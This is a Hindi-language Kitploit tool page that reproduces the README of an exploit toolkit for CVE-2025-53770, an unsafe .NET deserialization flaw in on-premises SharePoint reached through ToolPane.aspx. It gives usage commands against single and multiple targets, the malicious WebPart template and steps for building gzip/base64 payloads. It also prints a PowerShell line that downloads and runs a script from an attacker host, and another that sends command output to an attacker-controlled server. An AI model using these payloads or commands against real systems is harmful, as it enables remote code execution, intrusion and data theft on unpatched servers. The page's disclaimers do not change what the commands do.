Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53770-Exploit — SharePoint WebPart इंजेक्शन एक्सप्लॉइट टूल | Kitploit
उपकरण/GitHubGitHub/soltanali0/cve-2025-53770-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubsoltanali0/cve-2025-53770-exploit

CVE-2025-53770-Exploit

SharePoint WebPart इंजेक्शन एक्सप्लॉइट टूल

रिपॉजिटरी देखें
3137739 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📌 SharePoint WebPart इंजेक्शन एक्सप्लॉइट टूलकिट

🍕 SharePoint WebPart इंजेक्शन (ToolPane.aspx के माध्यम से) के लिए एक्सप्लॉइट टूल, जो .NET डीसीरियलाइज़ेशन और संभावित रिमोट कोड एक्ज़ीक्यूशन (RCE) की ओर ले जाता है।

द्वारा विकसित: @GOTOCVE


🌍 अवलोकन

यह टूल Microsoft SharePoint (ऑन-प्रिमाइसेस) में एक कमज़ोरी का शोषण करता है जो प्रमाणित उपयोगकर्ताओं को ToolPane.aspx एंडपॉइंट का दुरुपयोग करने और GZIP-संपीड़ित सीरियलाइज़्ड .NET ऑब्जेक्ट वाले दुर्भावनापूर्ण WebParts इंजेक्ट करने की अनुमति देता है।

इंजेक्ट किया गया ऑब्जेक्ट MSOTlPn_SelectedWpId पैरामीटर के अंदर रखा जाता है और एक नकली WebPart (जैसे <Scorecard:ExcelDataSet>) में एम्बेड किया जाता है जिसे SharePoint बैकएंड द्वारा पार्स और डीसीरियलाइज़ किया जाता है।


⚙️ विशेषताएँ

  • ✅ स्वचालित एंडपॉइंट सत्यापन (ToolPane.aspx)
  • ✅ उपयोगकर्ता-प्रदत्त पेलोड का इंजेक्शन (GZIP+Base64-एन्कोडेड .NET LosFormatter ऑब्जेक्ट)
  • ✅ Burp/ZAP के लिए प्रॉक्सी समर्थन
  • ✅ फ़ाइल-आधारित या प्रत्यक्ष पेलोड इनपुट के लिए समर्थन

🧪 समर्थित संस्करण

उत्पादप्रभावित संस्करण
SharePoint Server 201616.0.4351.1000 - 16.0.5508.1000
SharePoint Server 201916.0.10337.12109 - 16.0.10417.20027

⚡ कमज़ोरी सारांश

फ़ील्डमान
घटकमाइक्रोसॉफ्ट शेयरपॉइंट (ऑन-प्रिमाइसेस)
एंडपॉइंट/layouts/15/ToolPane.aspx
पैरामीटरMSOTlPn_DWP
वेबपार्ट<Scorecard:ExcelDataSet CompressedDataTable>
समस्याअसुरक्षित .NET डीसीरियलाइज़ेशन
CVECVE-2025-53770

🧰 टूलकिट घटक

✅ 1. exploit.py

CVE-2025-53770 के लिए मल्टी-थ्रेडेड SharePoint एक्सप्लॉइट टूल।

  • SharePoint + संस्करण का पता लगाता है
  • /ToolPane.aspx तक पहुँच की जाँच करता है
  • दुर्भावनापूर्ण WebPart पेलोड भेजता है

✅ 2. YSLosf.exe

LosFormatter पेलोड जनरेटर और डीसीरियलाइज़र।

छवि

🚀 उपयोग

🔸 बुनियादी उपयोग

root@kitploit:~
python3 exploit.py -u https://target -p payload.txt

🔸 एकाधिक लक्ष्य

root@kitploit:~
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080

🔸 सभी तर्क

तर्कविवरण
-uलक्ष्य URL (जैसे https://sp.company.local)
-fलक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
-pपेलोड फ़ाइल या सीधे Base64 GZIP स्ट्रिंग
--proxyवैकल्पिक प्रॉक्सी (जैसे http://127.0.0.1:8080)
-tसेकंड में टाइमआउट (डिफ़ॉल्ट: 15)

🔧 आवश्यकताएँ

  • Python 3.10
  • निर्भरताएँ स्थापित करें:
root@kitploit:~
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  • .NET 4.8 रनटाइम (YSLosf.exe चलाने के लिए)

💥 पेलोड संरचना

आपका पेलोड निम्नलिखित होना चाहिए:

  1. एक .NET ऑब्जेक्ट (जैसे DataSet, ObjectDataProvider)
  2. LosFormatter या BinaryFormatter का उपयोग करके सीरियलाइज़ किया गया
  3. Base64-एन्कोडेड
  4. GZIP-संपीड़ित

एक WebPart में इस प्रकार एम्बेडेड:

root@kitploit:~
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>

🛠 YSLosf के साथ पेलोड जनरेट करना

चरण 1: पेलोड फ़ाइल बनाएँ

अपना कमांड (जैसे रिवर्स शेल) payload.txt में डालें:

root@kitploit:~
powershell -nop -c iwr http://attacker/shell.ps1 | iex

चरण 2: Base64 पेलोड जनरेट करें

root@kitploit:~
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc

चरण 3: संपीड़ित करें और अंतिम रूप दें

root@kitploit:~
# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)

आउटपुट को payload-final.txt में सेव करें और इसे एक्सप्लॉइट टूल को पास करें।


🧵 समर्थित गैजेट चेन

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Windows.Data.ObjectDataProvider
  • System.Web.UI.LosFormatter

📡 कमांड आउटपुट पर नोट्स

यह कमज़ोरी प्रतिक्रिया में आउटपुट (जैसे ipconfig) नहीं लौटाती है। आपको यह करना होगा:

  • रिवर्स शेल पेलोड का उपयोग करें
  • या आउटपुट एक्सफ़िल्ट्रेट करें:
root@kitploit:~
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"

⚠️ कानूनी अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया जाता है।

स्पष्ट अनुमति के बिना सिस्टम के खिलाफ उपयोग न करें। दुरुपयोग अवैध और अनैतिक हो सकता है।


🔍 पता लगाना

यदि कोई कमज़ोर सर्वर पेलोड स्वीकार करता है और MSOTlPn_SelectedWpId को प्रतिबिंबित करता है या इंजेक्टेड WebPart के साथ पेज रेंडर करता है, तो इसका शोषण होने की संभावना है। कोई आउटपुट न होने का मतलब है कि डीसीरियलाइज़ेशन विफल रहा या सर्वर ने इसे पैच कर दिया।


🛑 कानूनी स्पष्टीकरण और इस टूल का दायरा

यह टूल किसी भी शेलकोड, वेब शेल को वितरित या निष्पादित नहीं करता है।

यह केवल एक दुर्भावनापूर्ण WebPart संरचना का उपयोग करके कमज़ोर ToolPane.aspx एंडपॉइंट के माध्यम से .NET डीसीरियलाइज़ेशन कमज़ोरी (CVE-2025-53770) के शोषण का प्रदर्शन करता है जिसमें GZIP-संपीड़ित .NET ऑब्जेक्ट होता है।

🔹 उद्देश्य: शोधकर्ताओं, रेड टीमर्स और डिफ़ेंडरों को कमज़ोर SharePoint सर्वर का पता लगाने और कस्टम पेलोड के साथ सुरक्षित रूप से इंजेक्शन वेक्टर का परीक्षण करने में मदद करना।

🔹 पेलोड: टूल में उपयोगकर्ताओं को अपने स्वयं के पेलोड जनरेट करने की आवश्यकता होती है (जैसे YSLosf.exe का उपयोग करके) जो WebPart में Base64-एन्कोडेड GZIP स्ट्रिंग के रूप में एम्बेड किए जाते हैं।
उपयोगकर्ता की ज़िम्मेदारी है कि वे उपयुक्त और नैतिक पेलोड चुनें (जैसे हानिरहित calc.exe निष्पादन, बीकन मार्कर, आदि)।

🔹 कोई रिवर्स शेल/वेब शेल शामिल नहीं:
जबकि आक्रमणकारी spinstall0.aspx जैसे वेब शेल छोड़ सकते हैं, इस प्रोजेक्ट में ऐसा कोई लॉजिक शामिल नहीं है।
यदि आप रिवर्स शेल वितरित करने की योजना बना रहे हैं, तो आपको अपना स्वयं का पेलोड मैन्युअल रूप से जनरेट करना होगा और इसके उपयोग की पूरी जिम्मेदारी लेनी होगी।

स्टार हिस्ट्री

Star History Chart

📢 और अधिक एक्सप्लॉइट और CVE?

टेलीग्राम पर @GOTOCVE से जुड़ें:

  • 🔍 साप्ताहिक CVE विश्लेषण
  • 🧠 गहन एक्सप्लॉइट राइटअप
  • 🛡 रेड और ब्लू टीम सामग्री
  • 💣 वास्तविक PoCs और पता लगाने के टिप्स

📬 संपर्क

द्वारा निर्मित Ali Soltani
शोध संबंधी पूछताछ या बग रिपोर्ट के लिए, टेलीग्राम पर संदेश भेजें।

टूल डाउनलोड करें